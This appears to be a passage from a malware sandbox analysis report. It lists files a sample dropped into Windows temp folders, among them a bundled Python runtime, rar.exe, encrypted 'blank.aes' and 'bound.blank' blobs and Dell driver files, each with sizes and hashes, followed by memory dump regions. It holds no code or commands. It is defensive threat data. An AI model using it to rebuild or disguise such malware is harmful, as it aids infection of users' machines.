SHA256
365c859328c9ba36c8da7221693cdccdd7a184381b7afc86b612b696da936c48

SHA512
964753132260ce1d9bf150071444fa2bd9308b4c2ea0d6cda3ae6152abe57caaf41718554672ea14fee88f84848671e1bb46ff28e9e5c136b4778d3d8f1c517e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-locale-l1-1-0.dll

Filesize
15KB

MD5
39e2d7899224d4344ea38c536ec75f55

SHA1
e5ea339cedf94170b6f48fa1cf1c143ea01e2958

SHA256
88dd3acf12907fe048bc34c9ab465a68c01f82486621653eb5bb00ac5193a6bf

SHA512
6ea0dec287e634d293db03c643393fdf027b4c4ed62d16ab669a2c799e973505dd6f0c220dfdb810375c4632efb5f49c76880a53dc192a8ca23bdacab520cad5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-math-l1-1-0.dll

Filesize
23KB

MD5
28592d3bf5007a36807073ba6d09a13f

SHA1
7222e3ff21062e286e01df62abd9dcc2e673ae77

SHA256
76fed7ddcee614835eaa2f1a510cb5b90b7f12ceb8c60ef24535f779484b17af

SHA512
c918425541f054c8dccc5e911d2f783cfd1e436bd6a11f59a92d79f10541704a36f2f72ad41a7c8ad0ec79f1a0c5259791fe4333f607d20416cbea2f1b5621b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-process-l1-1-0.dll

Filesize
15KB

MD5
b604f7a6e98c63334fe697049aeb6535

SHA1
ca092323bfbf1c14e4135cc852f13e3a5f95bbfa

SHA256
694ef2d431bdf2f789cfe2ecf168c36bd3a4bcb458bae37ab8527b5cde45b95a

SHA512
24106640b577589e62130924389c7391856b7f1537335d1ec3a9d4a4aa5a13c17a7801b77d08461ee4a34068d4103c29f2a204d77e68ba123c5869109d60214b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
19KB

MD5
ef604b403d8c8ae510fb246a4c9fee8b

SHA1
c61129d6bed00dbad3757fbbb699458b088ce5e2

SHA256
26ead74fe1e04a7ebdea755174a0480020c561870e3c97bd8fbb2cd70b1ba41a

SHA512
624ae1aade1aaa6ac671ddb69ee9fb7cf829ae88d142158a1f9ba511dfd7a7787661101550b278b73bd707d04b9c2b28b3188f8b416c30d6d493053472ca08c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-stdio-l1-1-0.dll

Filesize
20KB

MD5
35bb35144014f4f701fc97f7d0f0adfb

SHA1
b4935fb75da5676c760946dd3787d284f5a02d55

SHA256
467053555ce1b1adefb52113b4f6aad98bc5d627ff742ef2938b38ff13fa802d

SHA512
a9e477fd9000080404e9ebb1d687c24b951d59fd27dd770ed5dfc7dfde7db355e35e487728cb1dec665dac2e7ac41dadfd9593462c5d3e1fbce5f7a95e314aba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-string-l1-1-0.dll

Filesize
20KB

MD5
3461b5e5e3d2580a99c516a3dea059cb

SHA1
1c0ba8bc8804a55ed7f25aee68747a73049b739f

SHA256
220eb9c47b2ba635a3906de7f5ba82276018585845a9cc2b3152273b2d1a6a09

SHA512
87e2e22bd8dcb70c0b816b560ccd2f0159168ef42f484d69c5d52a483e8369002e7bf92b3808e253a1678cd28f3bd39050e932905d029d47180b78b045336ecc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-time-l1-1-0.dll

Filesize
17KB

MD5
74e5499783f32996e5c41d394ec9d0cc

SHA1
81725d3a77441df2d29e43fa9a581a0709dfca6d

SHA256
e51e5213a23c027777a0b03b8be7fee15430ab2999c9b2e52c9b09cb67c1d326

SHA512
85f8e362d64d86d307c5974fc3fce3ea1f16fe7aa58053d81ed86f697836cb362102098017228fc122826a679213451f7ed49de8643664007181189a0b6d62ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\api-ms-win-crt-utility-l1-1-0.dll

Filesize
15KB

MD5
c12bf7804c25f80fbe82f73ef6a6bd3c

SHA1
bdc0f3319e4269e6b2d760330fff7a50b331513a

SHA256
2388def1cd8e927a7c98db6e830e3e6a30069a4d635c5a0623fe664f117671ba

SHA512
67660d4eeaa8d63e65304dfa6098177685de7a3994b3537d30bd1de1304f8178ed9bc57c45c9fa777f67c4c0666d22cbcf9537e4afb58891cf3ff7b24a6cbfed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\base_library.zip

Filesize
1.4MB

MD5
83d235e1f5b0ee5b0282b5ab7244f6c4

SHA1
629a1ce71314d7abbce96674a1ddf9f38c4a5e9c

SHA256
db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0

SHA512
77364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\blank.aes

Filesize
120KB

MD5
2346ded479e9ffd02b662c97be74fd05

SHA1
5ba8c66b3c686b50616adaa75fadfc2f406735bd

SHA256
426bab25fc64950b9e71ab5a2a1cc50fba31602fa704a800a2e6206ce76f219c

SHA512
ea28aeb38538fd1dc39fabb628cb085f5399ece1974549fc3bcd2e31bbeb9a1e15b653e6bced970fa27a219e35a73b32dcb80bf9ea957ddd28cc4092165230c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\bound.blank

Filesize
25.8MB

MD5
cddbe8cc71c1ee067a437931010df3d7

SHA1
7eaa1ec5ef2e63abc8580428252ca2433aa7470f

SHA256
7be3d061f5b6c41e0848602beb6321bc1758836c0d8a2b9fd7dfb80c4a29edd8

SHA512
4089f6dc0fc337c39203058f1473cc0e1cfbd75cec45dfe691826e4f0669e01464c7034d311d4f9d0c76ed0125a8566a0880b1c9610a63050658cf501db360f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\libcrypto-1_1.dll

Filesize
1.1MB

MD5
daa2eed9dceafaef826557ff8a754204

SHA1
27d668af7015843104aa5c20ec6bbd30f673e901

SHA256
4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

SHA512
7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\libffi-8.dll

Filesize
24KB

MD5
90a6b0264a81bb8436419517c9c232fa

SHA1
17b1047158287eb6471416c5df262b50d6fe1aed

SHA256
5c4a0d4910987a38a3cd31eae5f1c909029f7762d1a5faf4a2e2a7e9b1abab79

SHA512
1988dd58d291ee04ebfec89836bb14fcaafb9d1d71a93e57bd06fe592feace96cdde6fcce46ff8747339659a9a44cdd6cf6ac57ff495d0c15375221bf9b1666e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\libssl-1_1.dll

Filesize
203KB

MD5
eac369b3fde5c6e8955bd0b8e31d0830

SHA1
4bf77158c18fe3a290e44abd2ac1834675de66b4

SHA256
60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

SHA512
c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\python311.dll

Filesize
1.6MB

MD5
bb46b85029b543b70276ad8e4c238799

SHA1
123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

SHA256
72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

SHA512
5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\select.pyd

Filesize
24KB

MD5
abf7864db4445bbbd491c8cff0410ae0

SHA1
4b0f3c5c7bf06c81a2c2c5693d37ef49f642a9b7

SHA256
ddeade367bc15ea09d42b2733d88f092da5e880362eabe98d574bc91e03de30e

SHA512
8f55084ee137416e9d61fe7de19e4cff25a4b752494e9b1d6f14089448ef93e15cd820f9457c6ce9268781bd08e3df41c5284801f03742bc5c40b3b81fb798c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\sqlite3.dll

Filesize
608KB

MD5
ddd0dd698865a11b0c5077f6dd44a9d7

SHA1
46cd75111d2654910f776052cc30b5e1fceb5aee

SHA256
a9dd0275131105df5611f31a9e6fbf27fd77d0a35d1a73a9f4941235fbc68bd7

SHA512
b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\ucrtbase.dll

Filesize
964KB

MD5
5e03bf59002af99314d5339d47a5cc32

SHA1
527069969b3152b5f0c48809f3a22756feaf09aa

SHA256
ecc588c03734d61d39980977f76beeec198f0fb351ed6651a91a24a5d0c6e791

SHA512
67d11eea147970c1d5ee98964e867ce93f619fcd7f1fca8f3898dbd51c0d4cdb20af533fdb38caeb12fa2791369cf21523749256b8a5270a1fccab27ed8c58c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI10082\unicodedata.pyd

Filesize
293KB

MD5
bb3fca6f17c9510b6fb42101fe802e3c

SHA1
cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

SHA256
5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

SHA512
05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ww2cxwev.oab.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\{73e12d6a-1c0b-7943-905c-aad00cad5d10}\dcdbas64.cat

Filesize
8KB

MD5
c39563be9488863e364bc4fa540d481f

SHA1
5bb5ee4736813f2f00cddf20a5c6b21101495f63

SHA256
1caaf593e2fdb96b938f0c57f122b99334165f1ffa1e3dfc8f697e43167dcb86

SHA512
3b4cce21efb1fe04848baaf7a4d699b00b5638d788ebaf8a7e51120ec142598684472b45dc99573ae428fceac19c09ff5901a9ad27ea7122b0052443c05fe3c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\{73e12d6a-1c0b-7943-905c-aad00cad5d10}\dcdbas64.inf

Filesize
1KB

MD5
574da06d1cf3115f4b0b6e42ae125efb

SHA1
985094231b5ed73fcecc85072509b856626b56b3

SHA256
3283ac1f4488903a2e1ae257235886d4295f0fc89af8a7f450544ce1ad770076

SHA512
3a739c98afc4a0fadee5ecdd3e4e71587ed8b0b3a5afcd2b18085cb23ffa4c35bdc8026587a78186c4c4fad1646f4b820c1a458b0ac7414476f813b97aeda558

Download Submit
C:\Users\Admin\AppData\Local\Temp\{73e12d6a-1c0b-7943-905c-aad00cad5d10}\dcdbas64.sys

Filesize
38KB

MD5
14ce4650c8426e06151bc5ddeab34fae

SHA1
eb15f49a2b70ab5abbd3a7fc125bbfaf7c8d3e27

SHA256
8aa3fbe585044f0220fa95fda5c2a4f599124dafa7feda42cc41fff537978a87

SHA512
bc4d02c415218f668508585dadcd7134f4c34db1fb6967fbe555a48b636afbf1ba09779043db57a5454fe457e5038f65a8c5e9da7f227d926d496bf451b9ad24

Download Submit
C:\Windows\Temp\{8DB5C695-D425-455C-84E6-2908B1F93687}\hapi\dcdipm64.sys

Filesize
15B

MD5
2f0e27283ede4a1e312d3160d8046ecd

SHA1
cac75693c68799d30edd9e047c78481e48a9e9c1

SHA256
dab7724e5bf8559f26e0c3f385d554895e9122fbdeb97015f9f9081a9445978e

SHA512
1188e8d169579ce60861705352f692d3ff11650af118df340cd4f7365d603a090f064cacf23a8e9bc56a7e4ca8f6c1c530fd0bff4266f3f6daf5f636c1b02940

Download Submit
memory/1248-155-0x0000024BF2720000-0x0000024BF2742000-memory.dmp

Filesize
136KB

Download
memory/1248-147-0x00007FF814543000-0x00007FF814545000-memory.dmp

Filesize
8KB

Download
memory/1248-184-0x00007FF814540000-0x00007FF815001000-memory.dmp

Filesize
10.8MB

Download
memory/1248-148-0x00007FF814540000-0x00007FF815001000-memory.dmp

Filesize
10.8MB

Download
memory/1248-160-0x00007FF814540000-0x00007FF815001000-memory.dmp

Filesize
10.8MB

Download
memory/3284-349-0x000001C53CEF0000-0x000001C53CEF8000-memory.dmp

Filesize
32KB

Download
memory/3456-127-0x00007FF82DBE0000-0x00007FF82DBEF000-memory.dmp

Filesize
60KB

Download
memory/3456-132-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp

Filesize
180KB

Download
memory/3456-142-0x00007FF815910000-0x00007FF815EF8000-memory.dmp

Filesize
5.9MB

Download
memory/3456-145-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp

Filesize
144KB

Download
memory/3456-144-0x00007FF8251D0000-0x00007FF8251DD000-memory.dmp

Filesize
52KB

Download
memory/3456-143-0x00007FF8251E0000-0x00007FF8251F4000-memory.dmp

Filesize
80KB

Download
memory/3456-146-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp

Filesize
180KB

Download
memory/3456-141-0x000001861D880000-0x000001861DBF5000-memory.dmp

Filesize
3.5MB

Download
memory/3456-133-0x00007FF82AAA0000-0x00007FF82AAB9000-memory.dmp

Filesize
100KB

Download
memory/3456-139-0x00007FF8245D0000-0x00007FF824688000-memory.dmp

Filesize
736KB

Download
memory/3456-162-0x00007FF80DC50000-0x00007FF80DD6C000-memory.dmp

Filesize
1.1MB

Download
memory/3456-161-0x00007FF825230000-0x00007FF825253000-memory.dmp

Filesize
140KB

Download
memory/3456-134-0x00007FF825230000-0x00007FF825253000-memory.dmp

Filesize
140KB

Download
memory/3456-480-0x00007FF8245D0000-0x00007FF824688000-memory.dmp

Filesize
736KB

Download
memory/3456-137-0x00007FF828A90000-0x00007FF828A9D000-memory.dmp

Filesize
52KB

Download
memory/3456-481-0x00007FF815410000-0x00007FF815785000-memory.dmp

Filesize
3.5MB

Download
memory/3456-335-0x00007FF815790000-0x00007FF815903000-memory.dmp

Filesize
1.4MB

Download
memory/3456-136-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp

Filesize
100KB

Download
memory/3456-67-0x00007FF815910000-0x00007FF815EF8000-memory.dmp

Filesize
5.9MB

Download
memory/3456-135-0x00007FF815790000-0x00007FF815903000-memory.dmp

Filesize
1.4MB

Download
memory/3456-126-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp

Filesize
144KB

Download
memory/3456-470-0x00007FF815910000-0x00007FF815EF8000-memory.dmp

Filesize
5.9MB

Download
memory/3456-140-0x00007FF815410000-0x00007FF815785000-memory.dmp

Filesize
3.5MB

Download
memory/3456-485-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp

Filesize
100KB

Download
memory/3456-138-0x00007FF825200000-0x00007FF82522E000-memory.dmp

Filesize
184KB

Download
memory/3456-479-0x00007FF825200000-0x00007FF82522E000-memory.dmp

Filesize
184KB

Download
memory/3456-476-0x00007FF815790000-0x00007FF815903000-memory.dmp

Filesize
1.4MB

Download
memory/3456-471-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp

Filesize
144KB

Download
memory/3456-519-0x000001861D880000-0x000001861DBF5000-memory.dmp

Filesize
3.5MB

Download
memory/3456-535-0x00007FF8251D0000-0x00007FF8251DD000-memory.dmp

Filesize
52KB

Download
memory/3456-546-0x00007FF815410000-0x00007FF815785000-memory.dmp

Filesize
3.5MB

Download
memory/3456-548-0x00007FF8251E0000-0x00007FF8251F4000-memory.dmp

Filesize
80KB

Download
memory/3456-547-0x000001861D880000-0x000001861DBF5000-memory.dmp

Filesize
3.5MB

Download
memory/3456-541-0x00007FF815790000-0x00007FF815903000-memory.dmp

Filesize
1.4MB

Download
memory/3456-545-0x00007FF8245D0000-0x00007FF824688000-memory.dmp

Filesize
736KB

Download
memory/3456-544-0x00007FF825200000-0x00007FF82522E000-memory.dmp

Filesize
184KB

Download
memory/3456-543-0x00007FF828A90000-0x00007FF828A9D000-memory.dmp

Filesize
52KB

Download
memory/3456-542-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp

Filesize
100KB

Download
memory/3456-540-0x00007FF82AAA0000-0x00007FF82AAB9000-memory.dmp

Filesize
100KB

Download
memory/3456-539-0x00007FF825230000-0x00007FF825253000-memory.dmp

Filesize
140KB

Download
memory/3456-538-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp

Filesize
180KB

Download
memory/3456-537-0x00007FF82DBE0000-0x00007FF82DBEF000-memory.dmp

Filesize
60KB

Download
memory/3456-536-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp

Filesize
144KB

Download
memory/3456-534-0x00007FF80DC50000-0x00007FF80DD6C000-memory.dmp

Filesize
1.1MB

Download
memory/3456-520-0x00007FF815910000-0x00007FF815EF8000-memory.dmp

Filesize
5.9MB

Download